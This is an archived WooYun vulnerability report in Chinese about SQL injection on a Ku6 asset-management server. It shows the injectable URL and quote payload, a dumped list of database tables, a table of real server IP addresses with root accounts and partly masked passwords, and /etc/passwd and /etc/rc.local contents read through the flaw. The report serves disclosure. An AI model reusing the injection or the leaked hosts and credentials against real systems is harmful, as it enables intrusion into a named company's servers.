缺陷编号:WooYun-2014-088881
漏洞标题:酷6网某核心服务器存在SQL注射漏洞(root权限可读写文件)
相关厂商:酷6网
漏洞作者:路人甲
提交时间:2014-12-27 02:15
公开时间:2015-01-01 02:16
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
2014-12-27: 细节已通知厂商并且等待厂商处理中
2014-12-27: 厂商已查看当前漏洞内容,细节仅向厂商公开
2015-01-01: 厂商已经主动忽略漏洞,细节向公众公开
酷6网某核心服务器存在SQL注射漏洞,进一步利用可摧毁机房
1 2 |
http://fixedassets.ku6.cn/req_sub_business_list.php?business_id=1'<br> Query failed:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by sub_business_id' at line 1 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 |
Database: itil<br> [91 tables]<br> +-------------------------------+<br> | CDN_storage_config |<br> | cdn_fixed_collection |<br> | fixed_cdn_count_by_excel |<br> | m5_server |<br> | maintenance_info |<br> | malfunction_report |<br> | monitor_item_report |<br> | monitor_report |<br> | portscan |<br> | portscanext |<br> | report_center |<br> | tb_business |<br> | tb_cdn_config |<br> | tb_cdn_push_speed |<br> | tb_cdn_storage |<br> | tb_cdn_storage_back |<br> | tb_cdnid_usage |<br> | tb_cdnid_usage_0101 |<br> | tb_cdnid_usage_history |<br> | tb_change_history |<br> | tb_company |<br> | tb_contract |<br> | tb_contract_ext |<br> | tb_delnode_flow |<br> | tb_delnode_flow_step |<br> | tb_delnode_step_user |<br> | tb_department |<br> | tb_district |<br> | tb_fixed_appliances |<br> | tb_fixed_applicant |<br> | tb_fixed_cabinet |<br> | tb_fixed_chair |<br> | tb_fixed_change_log |<br> | tb_fixed_data |<br> | tb_fixed_disk |<br> | tb_fixed_fax |<br> | tb_fixed_firewall |<br> | tb_fixed_furniture |<br> | tb_fixed_info |<br> | tb_fixed_it_other_equipment |<br> | tb_fixed_log |<br> | tb_fixed_mobile |<br> | tb_fixed_monitor |<br> | tb_fixed_new_studio_equipment |<br> | tb_fixed_note |<br> | tb_fixed_other |<br> | tb_fixed_pc |<br> | tb_fixed_printer |<br> | tb_fixed_projector |<br> | tb_fixed_recording |<br> | tb_fixed_server |<br> | tb_fixed_storage |<br> | tb_fixed_supplier |<br> | tb_fixed_switch |<br> | tb_fixed_table |<br> | tb_idc |<br> | tb_isp |<br> | tb_link |<br> | tb_link_20090326 |<br> | tb_log |<br> | tb_newnode_flow |<br> | tb_newnode_flow_step |<br> | tb_newnode_router |<br> | tb_newnode_server |<br> | tb_newnode_step_user |<br> | tb_os_type |<br> | tb_person |<br> | tb_privilege |<br> | tb_process |<br> | tb_province |<br> | tb_router |<br> | tb_s_base |<br> | tb_s_base_0401 |<br> | tb_s_hardware |<br> | tb_s_password |<br> | tb_s_port |<br> | tb_s_process |<br> | tb_s_software |<br> | tb_second_party |<br> | tb_server_log |<br> | tb_sub_business |<br> | tb_team |<br> | tb_tmp |<br> | tb_user |<br> | tb_user_tpl |<br> | view_cdn_server_link |<br> | view_cdn_storage |<br> | view_contract |<br> | view_idc |<br> | view_link_disc |<br> | view_server |<br> +-------------------------------+ |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
[06:34:32] [INFO] analyzing table dump for possible password hashes<br> Database: itil<br> Table: tb_newnode_server<br> [65 entries]<br> +-------+---------+-----------------+------+---------+---------+--------------+----------+<br> | id | ip2 | ip1 | user | port2 | port1 | passwd | server_u |<br> +-------+---------+-----------------+------+---------+---------+--------------+----------+<br> | 10000 | <blank> | 120.193.9.34 | root | <blank> | G0/5 | ku*******.com | 1U |<br> | 10000 | <blank> | 120.193.9.35 | root | <blank> | G0/6 | ku*******.com | 1U |<br> | 10000 | <blank> | 120.193.9.36 | root | <blank> | G0/7 | ku*******.com | 1U |<br> | 10000 | <blank> | 120.193.9.37 | root | <blank> | G0/8 | ku*******.com | 1U |<br> | 10000 | <blank> | 120.193.9.38 | root | <blank> | G0/9 | ku*******.com | 2U |<br> | 10000 | <blank> | 120.193.9.39 | root | <blank> | G0/1 | ku*******.com | 2U |<br> | 10000 | <blank> | 120.193.9.40 | root | <blank> | G0/2 | ku*******.com | 2U |<br> | 10000 | <blank> | 120.193.9.41 | root | <blank> | G0/3 | ku*******.com | 2U |<br> | 10000 | <blank> | 120.193.9.42 | root | <blank> | G0/4 | ku*******.com | 2U |
readfile: /etc/passwd
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
root:x:0:0:root:/root:/bin/bash<br> bin:x:1:1:bin:/bin:/sbin/nologin<br> daemon:x:2:2:daemon:/sbin:/sbin/nologin<br> adm:x:3:4:adm:/var/adm:/sbin/nologin<br> lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br> sync:x:5:0:sync:/sbin:/bin/sync<br> shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown<br> halt:x:7:0:halt:/sbin:/sbin/halt<br> mail:x:8:12:mail:/var/spool/mail:/sbin/nologin<br> uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin<br> operator:x:11:0:operator:/root:/sbin/nologin<br> games:x:12:100:games:/usr/games:/sbin/nologin<br> gopher:x:13:30:gopher:/var/gopher:/sbin/nologin<br> ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin<br> nobody:x:99:99:Nobody:/:/sbin/nologin<br> dbus:x:81:81:System message bus:/:/sbin/nologin<br> vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin<br> rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin<br> abrt:x:173:173::/etc/abrt:/sbin/nologin<br> haldaemon:x:68:68:HAL daemon:/:/sbin/nologin<br> ntp:x:38:38::/etc/ntp:/sbin/nologin<br> saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin<br> postfix:x:89:89::/var/spool/postfix:/sbin/nologin<br> rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin<br> nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin<br> sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin<br> tcpdump:x:72:72::/:/sbin/nologin<br> oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin<br> rd:x:500:500::/home/rd:/bin/bash<br> op:x:501:501::/home/op:/bin/bash<br> cdnscan:x:0:0::/home/cdnscan:/bin/bash<br> mysql:x:502:503::/home/mysql:/sbin/nologin<br> www:x:503:504::/home/www:/sbin/nologin |
readfile: /etc/rc.local
1 2 3 4 5 6 7 |
#!/bin/sh<br> #<br> # This script will be executed *after* all the other init scripts.<br> # You can put your own initialization stuff in here if you don't<br> # want to do the full Sys V style init stuff.<br> route add -net 10.11.0.0/16 gw 10.11.45.1<br> touch /var/lock/subsys/local |
过滤
危害等级:无影响厂商忽略
忽略时间:2015-01-0102:16
漏洞Rank:12 (WooYun评价)
暂无
坐等忽略....ku6被卖来卖去已经没人维护了
猪猪侠的
原文连接
的情况下转载,若非则不得使用我方内容。